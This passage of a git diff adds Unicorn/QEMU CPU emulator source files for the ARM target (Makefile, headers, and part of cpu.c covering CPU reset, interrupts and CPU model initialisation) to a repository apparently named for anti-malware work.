cpu_sparc_init cpu_sparc_init_sparc64 +#define cpu_sparc_set_id cpu_sparc_set_id_sparc64 +#define sparc_cpu_register_types sparc_cpu_register_types_sparc64 +#define helper_fadds helper_fadds_sparc64 +#define helper_faddd helper_faddd_sparc64 +#define helper_faddq helper_faddq_sparc64 +#define helper_fsubs helper_fsubs_sparc64 +#define helper_fsubd helper_fsubd_sparc64 +#define helper_fsubq helper_fsubq_sparc64 +#define helper_fmuls helper_fmuls_sparc64 +#define helper_fmuld helper_fmuld_sparc64 +#define helper_fmulq helper_fmulq_sparc64 +#define helper_fdivs helper_fdivs_sparc64 +#define helper_fdivd helper_fdivd_sparc64 +#define helper_fdivq helper_fdivq_sparc64 +#define helper_fsmuld helper_fsmuld_sparc64 +#define helper_fdmulq helper_fdmulq_sparc64 +#define helper_fnegs helper_fnegs_sparc64 +#define helper_fitos helper_fitos_sparc64 +#define helper_fitod helper_fitod_sparc64 +#define helper_fitoq helper_fitoq_sparc64 +#define helper_fdtos helper_fdtos_sparc64 +#define helper_fstod helper_fstod_sparc64 +#define helper_fqtos helper_fqtos_sparc64 +#define helper_fstoq helper_fstoq_sparc64 +#define helper_fqtod helper_fqtod_sparc64 +#define helper_fdtoq helper_fdtoq_sparc64 +#define helper_fstoi helper_fstoi_sparc64 +#define helper_fdtoi helper_fdtoi_sparc64 +#define helper_fqtoi helper_fqtoi_sparc64 +#define helper_fabss helper_fabss_sparc64 +#define helper_fsqrts helper_fsqrts_sparc64 +#define helper_fsqrtd helper_fsqrtd_sparc64 +#define helper_fsqrtq helper_fsqrtq_sparc64 +#define helper_fcmps helper_fcmps_sparc64 +#define helper_fcmpd helper_fcmpd_sparc64 +#define helper_fcmpes helper_fcmpes_sparc64 +#define helper_fcmped helper_fcmped_sparc64 +#define helper_fcmpq helper_fcmpq_sparc64 +#define helper_fcmpeq helper_fcmpeq_sparc64 +#define helper_ldfsr helper_ldfsr_sparc64 +#define helper_debug helper_debug_sparc64 +#define helper_udiv_cc helper_udiv_cc_sparc64 +#define helper_sdiv_cc helper_sdiv_cc_sparc64 +#define helper_taddcctv helper_taddcctv_sparc64 +#define helper_tsubcctv helper_tsubcctv_sparc64 +#define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc64 +#define helper_check_align helper_check_align_sparc64 +#define helper_ld_asi helper_ld_asi_sparc64 +#define helper_st_asi helper_st_asi_sparc64 +#define helper_cas_asi helper_cas_asi_sparc64 +#define helper_ldqf helper_ldqf_sparc64 +#define helper_stqf helper_stqf_sparc64 +#define sparc_cpu_unassigned_access sparc_cpu_unassigned_access_sparc64 +#define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc64 +#define sparc_cpu_handle_mmu_fault sparc_cpu_handle_mmu_fault_sparc64 +#define dump_mmu dump_mmu_sparc64 +#define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc64 +#define sparc_reg_reset sparc_reg_reset_sparc64 +#define sparc_reg_read sparc_reg_read_sparc64 +#define sparc_reg_write sparc_reg_write_sparc64 +#define gen_intermediate_code_init gen_intermediate_code_init_sparc64 +#define cpu_set_cwp cpu_set_cwp_sparc64 +#define cpu_get_psr cpu_get_psr_sparc64 +#define cpu_put_psr cpu_put_psr_sparc64 +#define cpu_cwp_inc cpu_cwp_inc_sparc64 +#define cpu_cwp_dec cpu_cwp_dec_sparc64 +#define helper_save helper_save_sparc64 +#define helper_restore helper_restore_sparc64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs new file mode 100644 index 0000000..483d620 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/Makefile.objs @@ -0,0 +1,6 @@ +obj-y += translate.o op_helper.o helper.o cpu.o +obj-y += neon_helper.o iwmmxt_helper.o +obj-$(CONFIG_SOFTMMU) += psci.o +obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o unicorn_aarch64.o +obj-$(TARGET_ARM) += unicorn_arm.o +obj-y += crypto_helper.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h new file mode 100644 index 0000000..b1ece01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/arm_ldst.h @@ -0,0 +1,48 @@ +/* + * ARM load/store instructions for code (armeb-user support) + * + * Copyright (c) 2012 CodeSourcery, LLC + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#ifndef ARM_LDST_H +#define ARM_LDST_H + +#include "exec/cpu_ldst.h" +#include "qemu/bswap.h" + +/* Load an instruction and return it in the standard little-endian order */ +static inline uint32_t arm_ldl_code(CPUARMState *env, target_ulong addr, + bool do_swap) +{ + uint32_t insn = cpu_ldl_code(env, addr); + if (do_swap) { + return bswap32(insn); + } + return insn; +} + +/* Ditto, for a halfword (Thumb) instruction */ +static inline uint16_t arm_lduw_code(CPUARMState *env, target_ulong addr, + bool do_swap) +{ + uint16_t insn = cpu_lduw_code(env, addr); + if (do_swap) { + return bswap16(insn); + } + return insn; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h new file mode 100644 index 0000000..fad08eb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu-qom.h @@ -0,0 +1,219 @@ +/* + * QEMU ARM CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ +#ifndef QEMU_ARM_CPU_QOM_H +#define QEMU_ARM_CPU_QOM_H + +#include "qom/cpu.h" + +#define TYPE_ARM_CPU "arm-cpu" + +#define ARM_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, ARMCPUClass, (klass), TYPE_ARM_CPU) +#define ARM_CPU(uc, obj) ((ARMCPU *)obj) +#define ARM_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, ARMCPUClass, (obj), TYPE_ARM_CPU) + +/** + * ARMCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * An ARM CPU model. + */ +typedef struct ARMCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} ARMCPUClass; + +/** + * ARMCPU: + * @env: #CPUARMState + * + * An ARM CPU core. + */ +typedef struct ARMCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUARMState env; + + /* Coprocessor information */ + GHashTable *cp_regs; + /* For marshalling (mostly coprocessor) register state between the + * kernel and QEMU (for KVM) and between two QEMUs (for migration), + * we use these arrays. + */ + /* List of register indexes managed via these arrays; (full KVM style + * 64 bit indexes, not CPRegInfo 32 bit indexes) + */ + uint64_t *cpreg_indexes; + /* Values of the registers (cpreg_indexes[i]'s value is cpreg_values[i]) */ + uint64_t *cpreg_values; + /* Length of the indexes, values, reset_values arrays */ + int32_t cpreg_array_len; + /* These are used only for migration: incoming data arrives in + * these fields and is sanity checked in post_load before copying + * to the working data structures above. + */ + uint64_t *cpreg_vmstate_indexes; + uint64_t *cpreg_vmstate_values; + int32_t cpreg_vmstate_array_len; + + /* Timers used by the generic (architected) timer */ + //QEMUTimer *gt_timer[NUM_GTIMERS]; + /* GPIO outputs for generic timer */ + //qemu_irq gt_timer_outputs[NUM_GTIMERS]; + + /* 'compatible' string for this CPU for Linux device trees */ + const char *dtb_compatible; + + /* PSCI version for this CPU + * Bits[31:16] = Major Version + * Bits[15:0] = Minor Version + */ + uint32_t psci_version; + + /* Should CPU start in PSCI powered-off state? */ + bool start_powered_off; + /* CPU currently in PSCI powered-off state */ + bool powered_off; + + /* PSCI conduit used to invoke PSCI methods + * 0 - disabled, 1 - smc, 2 - hvc + */ + uint32_t psci_conduit; + + /* [QEMU_]KVM_ARM_TARGET_* constant for this CPU, or + * QEMU_KVM_ARM_TARGET_NONE if the kernel doesn't support this CPU type. + */ + uint32_t kvm_target; + + /* KVM init features for this CPU */ + uint32_t kvm_init_features[7]; + + /* The instance init functions for implementation-specific subclasses + * set these fields to specify the implementation-dependent values of + * various constant registers and reset values of non-constant + * registers. + * Some of these might become QOM properties eventually. + * Field names match the official register names as defined in the + * ARMv7AR ARM Architecture Reference Manual. A reset_ prefix + * is used for reset values of non-constant registers; no reset_ + * prefix means a constant register. + */ + uint32_t midr; + uint32_t reset_fpsid; + uint32_t mvfr0; + uint32_t mvfr1; + uint32_t mvfr2; + uint32_t ctr; + uint32_t reset_sctlr; + uint32_t id_pfr0; + uint32_t id_pfr1; + uint32_t id_dfr0; + uint32_t id_afr0; + uint32_t id_mmfr0; + uint32_t id_mmfr1; + uint32_t id_mmfr2; + uint32_t id_mmfr3; + uint32_t id_isar0; + uint32_t id_isar1; + uint32_t id_isar2; + uint32_t id_isar3; + uint32_t id_isar4; + uint32_t id_isar5; + uint64_t id_aa64pfr0; + uint64_t id_aa64pfr1; + uint64_t id_aa64dfr0; + uint64_t id_aa64dfr1; + uint64_t id_aa64afr0; + uint64_t id_aa64afr1; + uint64_t id_aa64isar0; + uint64_t id_aa64isar1; + uint64_t id_aa64mmfr0; + uint64_t id_aa64mmfr1; + uint32_t dbgdidr; + uint32_t clidr; + /* The elements of this array are the CCSIDR values for each cache, + * in the order L1DCache, L1ICache, L2DCache, L2ICache, etc. + */ + uint32_t ccsidr[16]; + uint64_t reset_cbar; + uint32_t reset_auxcr; + bool reset_hivecs; + /* DCZ blocksize, in log_2(words), ie low 4 bits of DCZID_EL0 */ + uint32_t dcz_blocksize; + uint64_t rvbar; +} ARMCPU; + +#define TYPE_AARCH64_CPU "aarch64-cpu" +#define AARCH64_CPU_CLASS(klass) \ + OBJECT_CLASS_CHECK(AArch64CPUClass, (klass), TYPE_AARCH64_CPU) +#define AARCH64_CPU_GET_CLASS(obj) \ + OBJECT_GET_CLASS(AArch64CPUClass, (obj), TYPE_AArch64_CPU) + +typedef struct AArch64CPUClass { + /*< private >*/ + ARMCPUClass parent_class; + /*< public >*/ +} AArch64CPUClass; + +static inline ARMCPU *arm_env_get_cpu(CPUARMState *env) +{ + return container_of(env, ARMCPU, env); +} + +#define ENV_GET_CPU(e) CPU(arm_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(ARMCPU, env) + +#ifndef CONFIG_USER_ONLY +extern const struct VMStateDescription vmstate_arm_cpu; +#endif + +void register_cp_regs_for_features(ARMCPU *cpu); +void init_cpreg_list(ARMCPU *cpu); + +void arm_cpu_do_interrupt(CPUState *cpu); +void arm_v7m_cpu_do_interrupt(CPUState *cpu); +bool arm_cpu_exec_interrupt(CPUState *cpu, int int_req); + +hwaddr arm_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); + +int arm_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int arm_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +/* Callback functions for the generic timer's timers. */ +void arm_gt_ptimer_cb(void *opaque); +void arm_gt_vtimer_cb(void *opaque); + +#ifdef TARGET_AARCH64 +int aarch64_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int aarch64_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void aarch64_cpu_do_interrupt(CPUState *cs); +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c new file mode 100644 index 0000000..7a0b839 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c @@ -0,0 +1,1108 @@ +/* + * QEMU ARM CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "cpu.h" +#include "internals.h" +#include "qemu-common.h" +#include "qapi/qmp/qerror.h" +#include "hw/arm/arm.h" +#include "sysemu/sysemu.h" + +#include "uc_priv.h" + +static void arm_cpu_set_pc(CPUState *cs, vaddr value) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + + cpu->env.regs[15] = value; +} + +static bool arm_cpu_has_work(CPUState *cs) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + + return !cpu->powered_off + && cs->interrupt_request & + (CPU_INTERRUPT_FIQ | CPU_INTERRUPT_HARD + | CPU_INTERRUPT_VFIQ | CPU_INTERRUPT_VIRQ + | CPU_INTERRUPT_EXITTB); +} + +static void cp_reg_reset(gpointer key, gpointer value, gpointer opaque) +{ + /* Reset a single ARMCPRegInfo register */ + ARMCPRegInfo *ri = value; + ARMCPU *cpu = opaque; + + if (ri->type & ARM_CP_SPECIAL) { + return; + } + + if (ri->resetfn) { + ri->resetfn(&cpu->env, ri); + return; + } + + /* A zero offset is never possible as it would be regs[0] + * so we use it to indicate that reset is being handled elsewhere. + * This is basically only used for fields in non-core coprocessors + * (like the pxa2xx ones). + */ + if (!ri->fieldoffset) { + return; + } + + if (cpreg_field_is_64bit(ri)) { + CPREG_FIELD64(&cpu->env, ri) = ri->resetvalue; + } else { + CPREG_FIELD32(&cpu->env, ri) = ri->resetvalue; + } +} + +/* CPUClass::reset() */ +static void arm_cpu_reset(CPUState *s) +{ + CPUARMState *env = s->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, s); + ARMCPUClass *acc = ARM_CPU_GET_CLASS(env->uc, cpu); + + acc->parent_reset(s); + + memset(env, 0, offsetof(CPUARMState, features)); + g_hash_table_foreach(cpu->cp_regs, cp_reg_reset, cpu); + env->vfp.xregs[ARM_VFP_FPSID] = cpu->reset_fpsid; + env->vfp.xregs[ARM_VFP_MVFR0] = cpu->mvfr0; + env->vfp.xregs[ARM_VFP_MVFR1] = cpu->mvfr1; + env->vfp.xregs[ARM_VFP_MVFR2] = cpu->mvfr2; + + cpu->powered_off = cpu->start_powered_off; + s->halted = cpu->start_powered_off; + + if (arm_feature(env, ARM_FEATURE_IWMMXT)) { + env->iwmmxt.cregs[ARM_IWMMXT_wCID] = 0x69051000 | 'Q'; + } + + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + /* 64 bit CPUs always start in 64 bit mode */ + env->aarch64 = 1; +#if defined(CONFIG_USER_ONLY) + env->pstate = PSTATE_MODE_EL0t; + /* Userspace expects access to DC ZVA, CTL_EL0 and the cache ops */ + env->cp15.c1_sys |= SCTLR_UCT | SCTLR_UCI | SCTLR_DZE; + /* and to the FP/Neon instructions */ + env->cp15.c1_coproc = deposit64(env->cp15.c1_coproc, 20, 2, 3); +#else + env->pstate = PSTATE_MODE_EL1h; + env->pc = cpu->rvbar; +#endif + } else { +#if defined(CONFIG_USER_ONLY) + /* Userspace expects access to cp10 and cp11 for FP/Neon */ + env->cp15.c1_coproc = deposit64(env->cp15.c1_coproc, 20, 4, 0xf); +#endif + } + +#if defined(CONFIG_USER_ONLY) + env->uncached_cpsr = ARM_CPU_MODE_USR; + /* For user mode we must enable access to coprocessors */ + env->vfp.xregs[ARM_VFP_FPEXC] = 1 << 30; + if (arm_feature(env, ARM_FEATURE_IWMMXT)) { + env->cp15.c15_cpar = 3; + } else if (arm_feature(env, ARM_FEATURE_XSCALE)) { + env->cp15.c15_cpar = 1; + } +#else + /* SVC mode with interrupts disabled. */ + env->uncached_cpsr = ARM_CPU_MODE_SVC; + env->daif = PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F; + /* On ARMv7-M the CPSR_I is the value of the PRIMASK register, and is + * clear at reset. Initial SP and PC are loaded from ROM. + */ + if (IS_M(env)) { + uint32_t initial_msp; /* Loaded from 0x0 */ + uint32_t initial_pc; /* Loaded from 0x4 */ + + env->daif &= ~PSTATE_I; +#if 0 + uint8_t *rom; + rom = rom_ptr(0); + if (rom) { + /* Address zero is covered by ROM which hasn't yet been + * copied into physical memory. + */ + initial_msp = ldl_p(rom); + initial_pc = ldl_p(rom + 4); + } else +#endif + { + /* Address zero not covered by a ROM blob, or the ROM blob + * is in non-modifiable memory and this is a second reset after + * it got copied into memory. In the latter case, rom_ptr + * will return a NULL pointer and we should use ldl_phys instead. + */ + initial_msp = ldl_phys(s->as, 0); + initial_pc = ldl_phys(s->as, 4); + } + + env->regs[13] = initial_msp & 0xFFFFFFFC; + env->regs[15] = initial_pc & ~1; + env->thumb = initial_pc & 1; + } + + // Unicorn: force Thumb mode by setting of uc_open() + env->thumb = env->uc->thumb; + + if (env->cp15.c1_sys & SCTLR_V) { + env->regs[15] = 0xFFFF0000; + } + + env->vfp.xregs[ARM_VFP_FPEXC] = 0; +#endif + set_flush_to_zero(1, &env->vfp.standard_fp_status); + set_flush_inputs_to_zero(1, &env->vfp.standard_fp_status); + set_default_nan_mode(1, &env->vfp.standard_fp_status); + set_float_detect_tininess(float_tininess_before_rounding, + &env->vfp.fp_status); + set_float_detect_tininess(float_tininess_before_rounding, + &env->vfp.standard_fp_status); + tlb_flush(s, 1); + + hw_breakpoint_update_all(cpu); + hw_watchpoint_update_all(cpu); +} + +bool arm_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + CPUARMState *env = cs->env_ptr; + CPUClass *cc = CPU_GET_CLASS(env->uc, cs); + bool ret = false; + + if (interrupt_request & CPU_INTERRUPT_FIQ + && arm_excp_unmasked(cs, EXCP_FIQ)) { + cs->exception_index = EXCP_FIQ; + cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_HARD + && arm_excp_unmasked(cs, EXCP_IRQ)) { + cs->exception_index = EXCP_IRQ; + cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_VIRQ + && arm_excp_unmasked(cs, EXCP_VIRQ)) { + cs->exception_index = EXCP_VIRQ; + cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_VFIQ + && arm_excp_unmasked(cs, EXCP_VFIQ)) { + cs->exception_index = EXCP_VFIQ; + cc->do_interrupt(cs); + ret = true; + } + + return ret; +} + +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) +static bool arm_v7m_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + CPUARMState *env = cs->env_ptr; + CPUClass *cc = CPU_GET_CLASS(env->uc, cs); + bool ret = false; + + + if (interrupt_request & CPU_INTERRUPT_FIQ + && !(env->daif & PSTATE_F)) { + cs->exception_index = EXCP_FIQ; + cc->do_interrupt(cs); + ret = true; + } + /* ARMv7-M interrupt return works by loading a magic value + * into the PC. On real hardware the load causes the + * return to occur. The qemu implementation performs the + * jump normally, then does the exception return when the + * CPU tries to execute code at the magic address. + * This will cause the magic PC value to be pushed to + * the stack if an interrupt occurred at the wrong time. + * We avoid this by disabling interrupts when + * pc contains a magic address. + */ + if (interrupt_request & CPU_INTERRUPT_HARD + && !(env->daif & PSTATE_I) + && (env->regs[15] < 0xfffffff0)) { + cs->exception_index = EXCP_IRQ; + cc->do_interrupt(cs); + ret = true; + } + return ret; +} +#endif + +static inline void set_feature(CPUARMState *env, int feature) +{ + env->features |= 1ULL << feature; +} + +static void arm_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + ARMCPU *cpu = ARM_CPU(uc, obj); + + cs->env_ptr = &cpu->env; + cpu_exec_init(&cpu->env, opaque); + cpu->cp_regs = g_hash_table_new_full(g_int_hash, g_int_equal, + g_free, g_free); + +#if 0 +#ifndef CONFIG_USER_ONLY + /* Our inbound IRQ and FIQ lines */ + + cpu->gt_timer[GTIMER_PHYS] = timer_new(QEMU_CLOCK_VIRTUAL, GTIMER_SCALE, + arm_gt_ptimer_cb, cpu); + cpu->gt_timer[GTIMER_VIRT] = timer_new(QEMU_CLOCK_VIRTUAL, GTIMER_SCALE, + arm_gt_vtimer_cb, cpu); + //qdev_init_gpio_out(DEVICE(cpu), cpu->gt_timer_outputs, + // ARRAY_SIZE(cpu->gt_timer_outputs)); +#endif +#endif + + /* DTB consumers generally don't in fact care what the 'compatible' + * string is, so always provide some string and trust that a hypothetical + * picky DTB consumer will also provide a helpful error message. + */ + cpu->dtb_compatible = "qemu,unknown"; + cpu->psci_version = 1; /* By default assume PSCI v0.1 */ + cpu->kvm_target = QEMU_KVM_ARM_TARGET_NONE; + + if (tcg_enabled(uc)) { + cpu->psci_version = 2; /* TCG implements PSCI 0.2 */ + arm_translate_init(uc); + } +} + +static void arm_cpu_post_init(struct uc_struct *uc, Object *obj) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + if (arm_feature(&cpu->env, ARM_FEATURE_CBAR) || + arm_feature(&cpu->env, ARM_FEATURE_CBAR_RO)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_reset_cbar_property, + // &error_abort); + } + + if (!arm_feature(&cpu->env, ARM_FEATURE_M)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_reset_hivecs_property, + // &error_abort); + } + + if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_rvbar_property, + // &error_abort); + } +} + +static void arm_cpu_finalizefn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + g_hash_table_destroy(cpu->cp_regs); +} + +static int arm_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + ARMCPU *cpu = ARM_CPU(uc, dev); + ARMCPUClass *acc = ARM_CPU_GET_CLASS(uc, dev); + CPUARMState *env = &cpu->env; + + /* Some features automatically imply others: */ + if (arm_feature(env, ARM_FEATURE_V8)) { + set_feature(env, ARM_FEATURE_V7); + set_feature(env, ARM_FEATURE_ARM_DIV); + set_feature(env, ARM_FEATURE_LPAE); + } + if (arm_feature(env, ARM_FEATURE_V7)) { + set_feature(env, ARM_FEATURE_VAPA); + set_feature(env, ARM_FEATURE_THUMB2); + set_feature(env, ARM_FEATURE_MPIDR); + if (!arm_feature(env, ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_V6K); + } else { + set_feature(env, ARM_FEATURE_V6); + } + } + if (arm_feature(env, ARM_FEATURE_V6K)) { + set_feature(env, ARM_FEATURE_V6); + set_feature(env, ARM_FEATURE_MVFR); + } + if (arm_feature(env, ARM_FEATURE_V6)) { + set_feature(env, ARM_FEATURE_V5); + if (!arm_feature(env, ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_AUXCR); + } + } + if (arm_feature(env, ARM_FEATURE_V5)) { + set_feature(env, ARM_FEATURE_V4T); + } + if (arm_feature(env, ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_THUMB_DIV); + } + if (arm_feature(env, ARM_FEATURE_ARM_DIV)) { + set_feature(env, ARM_FEATURE_THUMB_DIV); + } + if (arm_feature(env, ARM_FEATURE_VFP4)) { + set_feature(env, ARM_FEATURE_VFP3); + set_feature(env, ARM_FEATURE_VFP_FP16); + } + if (arm_feature(env, ARM_FEATURE_VFP3)) { + set_feature(env, ARM_FEATURE_VFP); + } + if (arm_feature(env, ARM_FEATURE_LPAE)) { + set_feature(env, ARM_FEATURE_V7MP); + set_feature(env, ARM_FEATURE_PXN); + } + if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { + set_feature(env, ARM_FEATURE_CBAR); + } + + if (cpu->reset_hivecs) { + cpu->reset_sctlr |= (1 << 13); + } + + register_cp_regs_for_features(cpu); + arm_cpu_register_gdb_regs_for_features(cpu); + + init_cpreg_list(cpu); + + qemu_init_vcpu(cs); + cpu_reset(cs); + + acc->parent_realize(uc, dev, errp); + + return 0; +} + +static ObjectClass *arm_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (!cpu_model) { + return NULL; + } + + typename = g_strdup_printf("%s-" TYPE_ARM_CPU, cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + if (!oc || !object_class_dynamic_cast(uc, oc, TYPE_ARM_CPU) || + object_class_is_abstract(oc)) { + return NULL; + } + return oc; +} + +/* CPU models. These are not needed for the AArch64 linux-user build. */ +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) + +static void arm926_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm926"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); + cpu->midr = 0x41069265; + cpu->reset_fpsid = 0x41011090; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00090078; +} + +static void arm946_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm946"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_MPU); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x41059461; + cpu->ctr = 0x0f004006; + cpu->reset_sctlr = 0x00000078; +} + +static void arm1026_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1026"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_AUXCR); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); + cpu->midr = 0x4106a262; + cpu->reset_fpsid = 0x410110a0; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00090078; + cpu->reset_auxcr = 1; + { + /* The 1026 had an IFAR at c6,c0,0,1 rather than the ARMv6 c6,c0,0,2 */ + ARMCPRegInfo ifar = { 0 }; + ifar.name = "IFAR"; + ifar.cp = 15; + ifar.crn = 6; + ifar.crm = 0; + ifar.opc1 = 0; + ifar.opc2 = 1; + ifar.access = PL1_RW; + ifar.fieldoffset = offsetofhigh32(CPUARMState, cp15.far_el[1]); + ifar.resetvalue = 0; + define_one_arm_cp_reg(cpu, &ifar); + } +} + +static void arm1136_r2_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + /* What qemu calls "arm1136_r2" is actually the 1136 r0p2, ie an + * older core than plain "arm1136". In particular this does not + * have the v6K features. + * These ID register values are correct for 1136 but may be wrong + * for 1136_r2 (in particular r0p2 does not actually implement most + * of the ID registers). + */ + + cpu->dtb_compatible = "arm,arm1136"; + set_feature(&cpu->env, ARM_FEATURE_V6); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x4107b362; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0x2; + cpu->id_afr0 = 0x3; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222110; + cpu->id_isar0 = 0x00140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231111; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 7; +} + +static void arm1136_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1136"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_V6); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x4117b363; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; 